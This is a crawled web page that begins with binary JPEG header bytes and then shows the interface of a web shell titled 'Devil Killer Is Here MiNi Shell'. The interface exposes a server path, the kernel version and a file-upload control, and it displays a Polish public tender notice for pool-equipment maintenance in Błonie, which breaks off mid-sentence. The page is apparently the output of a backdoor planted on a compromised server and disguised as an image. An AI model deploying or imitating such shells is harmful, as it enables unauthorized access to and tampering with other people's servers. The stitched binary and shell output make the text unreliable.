JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221125/0046020201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usługi kompleksowej obsługi i konserwacji instalacji uzdatniania wody basenowej oraz serwisu urządzeń technologii basenowej w obiekcie Centrum Sportu w Błoniu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Sportu i Rekreacji w Błoniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366231546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Błonie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-870</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (22) 770-72-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">centrumsportu@blonie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cs-blonie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usługi kompleksowej obsługi i konserwacji instalacji uzdatniania wody basenowej oraz serwisu urządzeń technologii basenowej w obiekcie Centrum Sportu w Błoniu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed56f8b0-6cba-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00460202</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016270/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Obsługa urządzeń i instalacji technicznych wraz z ich konserwacją w wielofunkcyjnym budynku Centrum Sportu w Błoniu przy ul. Grodziskiej 1. – podbasenie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.cs-blonie.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">a) Składanie, zmiana oraz wycofanie ofert odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy Pzp , poprzez:<br/>- miniPortal dostępny pod adresem : https://miniportal.uzp.gov.pl/,<br/>- ePUAP dostępny pod adresem : https://epuap.gov.pl/wps/portal<br/>b) komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności:<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji, wezwań do złożenia, uzupełnienia, wyjaśnienia<br/>oświadczeń lub dokumentów, zadawanie pytań, jak i udzielanie odpowiedzi odbywa się tylko za pośrednictwem poczty elektronicznej Zamawiającego na adres e-mail: centrumsportu@blonie.pl<br/>adres strony internetowej Zamawiającego https://bip.cs-blonie.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) składanie, zmiana oraz wycofanie<br/>ofert odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy Pzp, poprzez:<br/>- miniPortal dostępny pod adresem : https://miniportal.uzp.gov.pl/ ,<br/>- ePUAP dostępny pod adresem : https://epuap.gov.pl/wps/portal<br/>b) komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności:<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji, wezwań do złożenia, uzupełnienia, wyjaśnienia<br/>oświadczeń lub dokumentów, zadawanie pytań, jak i udzielanie odpowiedzi odbywa się tylko za pośrednictwem poczty elektronicznej<br/>Zamawiającego na adres e-mail:<br/>- centrumsportu@blonie.pl Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Instrukcji korzystania z miniPortalu zamieszczonej na stronie<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z<br/>dostępem do sieci Internet. Aplikacja działa na Platformie:<br/>Windows, Mac i Linux. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>- specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/>- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu<br/>ePUAP.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>Microsoft Internet Explorer od wersji 11.0, Mozilla FireFox od wersji 15, Google Chrome od wersji 20,<br/>Microsoft Edge<br/>ID (identyfikator) danego postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich<br/>postępowań na miniPortalu.Wykonawca zamierzający wziąć udział w przedmiotowym postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP (https://epuap.gov.pl/wps/portal)<br/>Wykonawca posiadający konto na ePUAP ma dostęp m.in. do formularza złożenia, zmiany, wycofania<br/>oferty.<br/>ofertę należy złożyć w oryginale w postaci elektronicznej, opatrzoną kwalifikowanym podpisem<br/>elektronicznym , podpisem zaufanym lub podpisem osobistym.<br/>- zaleca się stosowanie podpisu wewnętrznego, który polega na tym, że jest zapisany łącznie z<br/>podpisywanym dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i plik podpisu),<br/>- zaleca się sporządzenie oferty i załączników do ofert w formacie PDF i podpisanie podpisem<br/>kwalifikowanym w formacie PAdES,<br/>- w przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia<br/>odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.<br/>- zaleca się stosowanie znacznika czasu w podpisie kwalifikowanym,<br/>- wykonawca nie może szyfrować przekazywanych plików samodzielnie ( szyfrowanie odbywa się<br/>zgodnie<br/>z pkt 8.2 h) poprzez stronę https://mimniportal.uzp.gov.pl.oferta musi być podpisana kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do<br/>reprezentowania Wykonawcy, w tym wspólnie ubiegających się Wykonawców o udzielenie<br/>zamówienia. wszystkie pliki stanowiące ofertę należy skompresować do jednego pliku archiwum (zip).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanego formularza do: złożenia, zmiany, wycofania oferty lub wniosku wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych Wykonawców, osób<br/>reprezentujących Wykonawców, pełnomocników i innych osób wskazanych w ofercie lub załączonych<br/>do niej dokumentach oraz umowie i jej załącznikach jest Zamawiający – dalej administrator – adres<br/>siedziby: ul. Grodziska 1, 05-870 Błonie<br/>Z administratorem można się skontaktować poprzez adres e-mail: centrumsportu@blonie.pl lub pod<br/>adresem siedziby administratora.<br/>Administrator wyznaczył inspektora ochrony danych, z którym można się skontaktować: iodo@rt-net.pl<br/>2. W zakresie w jakim przy realizacji Umowy dochodzi do udostępnienia przez Wykonawcę danych<br/>osobowych osób bezpośrednio zaangażowanych w realizację umowy, Zamawiający:<br/>1) Z chwilą udostępnienia staje się administratorem danych w rozumieniu art. 4 ust.7<br/>ROZPORZĄDZENIA PARLAMENTU EUROPEJSKIEGO I RADY (UE) 2016/679 z dnia 27<br/>kwietnia2016 r. w sprawie ochrony osób fizycznych<br/>i w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE zwanego dalej RODO.<br/>2) Jest zobowiązany do spełnienia obowiązków jakie ciążą na administratorze danych, w<br/>szczególności w zakresie dopełnienia obowiązku informacyjnego zgodnego z art. 14 RODO.<br/>3) Oświadcza, że wykorzysta przekazane mu dane osobowe w sposób, w który nie przekroczy granic<br/>niezbędnych do wykonania umowy, w szczególności nie będzie dokonywał czynności, które mogą<br/>zostać ocenione jako naruszające dobra osobiste osób, których dane zostały przekazane.<br/>3. Zamawiający zobowiązuje się do poinformowania swoich pracowników<br/>i współpracowników biorących udział w realizacji umowy o tym, że ich dane osobowe zostały<br/>udostępnione Wykonawcy przez Zamawiającego w celu prawidłowej realizacji umowy, w tym w celach<br/>kontaktowych. Poinformowanie będzie realizowane w imieniu Wykonawcy w sposób zgodny z art. 14<br/>RODO.<br/>4. Na potrzeby zawarcia i wykonania niniejszej Umowy przez „Informacje poufne” rozumie się<br/>informacje obejmujące: dane osobowe personelu, klientów, kontrahentów, beneficjentów.<br/>5. Wykonawca zobowiązuje się do zachowania w tajemnicy wszelkich informacji określonych w ust. 3<br/>powyżej, których ujawnienie mogłoby narazić Zamawiającego na szkodę lub odpowiedzialność prawną,<br/>w tym na podstawie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych), o których Wykonawca lub jego personel, dowie się w związku lub<br/>przy okazji realizacji niniejszej Umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.03.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 536000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Całościowy zakres usług stanowiących przedmiot zamówienia obejmuje przegląd okresowy i konserwację:<br/><br/>a.	- urządzeń EVOQUA/PROBIKO-AQUA, tylko serwis producenta lub serwis autoryzowany przez producenta urządzeń.<br/><br/>b.	- urządzeń technologii basenowej: KSB, SOCLA, ARTPOL THERM, VENTUR, ATLAS COPCO, FLOMAG, APATOR POWOGAZ, bez wymogu autoryzacji producenckiej (z wymogiem użycia oryginalnych części)<br/><br/>c.	- niecek basenowych SANELL wraz z wyposażeniem, instalacji hydraulicznej i zbiorników przelewowych, bez wymogu autoryzacji producenta, z wymogiem użycia materiałów zgodnych z dokumentacją powykonawczą dla niecek ze stali nierdzewnej (wymóg gwarancyjny ważny do 2025).<br/><br/>d.	- urządzeń układu sterowania automatyką technologii basenowej i instalacji dozującej chemię basenową ARUS/PROMINENT/GRUNDFOS/SACOPA, bez wymogu autoryzacji producenckiej (z wymogiem użycia oryginalnych części)<br/><br/>e.	- instalacji ultrafiltracji Ultra Ecoswim i filtrów niskociśnieniowych TECHNOL, tylko serwis producenta lub autoryzowany przez producenta urządzeń. <br/><br/>Szczegółowy opis zamówienia, wytyczne i wymagania Zamawiającego wobec Wykonawcy zawarte są w Opisie przedmiotu zamówienia ( OPZ ), który stanowi załączniki nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, <br/>tzn. polegających na powtórzeniu podobnych usług, stanowiących niniejsze zamówienie podstawowe:<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 30 % wartości zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia <br/> podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch miejsc po przecinku zgodnie z zasadami matematycznymi, a w kryterium czas przystąpienia do interwencji w przypadku awarii przyznane zostaną punkty całkowite (0, 10, 20, 30, 40).<br/> Zamawiający wybierze ofertę najkorzystniejszą spośród nie odrzuconych ofert na podstawie kryterium ceny i czasu przystąpienia do interwencji w przypadku awarii .<br/> Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do interwencji w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa <br/>w art. 112 ust.2 ustawy, którzy:<br/><br/>a) nie podlegają wykluczeniu ( na podstawie zapisów w pkt. 21 niniejszej SWZ, dotyczących podstaw wykluczenia )<br/><br/>b) spełniają następujące warunki udziału w postępowaniu w zakresie: <br/><br/>1) zdolności do występowania w obrocie gospodarczym,<br/>(Zamawiający nie precyzuje tego warunku);<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>(Zamawiający nie precyzuje tego warunku);<br/><br/>3) sytuacji ekonomicznej lub finansowej<br/><br/>Zamawiający wymaga - aby Wykonawca wykazał, że:<br/>posiada środki finansowe lub zdolność kredytową - w kwocie min. 100.000,00 zł <br/><br/>4) zdolności technicznej lub zawodowej<br/><br/>Zamawiający wymaga aby Wykonawca:<br/><br/>a. wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje - w okresie ostatnich 3 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie co najmniej jedną usługę, dotyczącą przeglądów okresowych i konserwacji urządzeń technologii basenowej, w tym m.in.:<br/><br/>- urządzeń: EVOQUA/PROBIKO-AQUA, <br/>- niecek basenowych ze stali nierdzewnej wraz z wyposażeniem, instalacji hydraulicznej i zbiorników przelewowych, <br/>- urządzeń układu sterowania automatyką technologii basenowej i instalacji dozującej chemię basenową minimum jednego z producentów :ARUS/PROMINENT/GRUNDFOS/SACOPA, <br/>- instalacji ultrafiltracji Ultra Ecoswim i filtrów niskociśnieniowych TECHNOL, <br/><br/><br/>b. skierował do realizacji zamówienia publicznego:<br/><br/>co najmniej jedną osobę posiadającą ( lub osoby posiadające w sumie ) odpowiednie kwalifikacje do prawidłowego wykonania powierzonych im czynności tj. :<br/>– kwalifikacje potwierdzone aktualnym stosownym certyfikatem lub innym dokumentem wystawionym przez producenta lub autoryzowanego przedstawiciela producenta urządzeń stanowiących przedmiot świadczonych usług ),<br/>- uprawnienia SEP (E lub D), badania sanitarne oraz certyfikat f-gazowy <br/>- co najmniej 1 - roczne doświadczenie zawodowe w świadczeniu usług stanowiących przedmiot zamówienia- dotyczy każdej z osób <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/><br/>*Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, <br/>zamiast dokumentów, o których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. <br/>Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem. <br/>Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez Zamawiającego dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy <br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020.2415)<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie 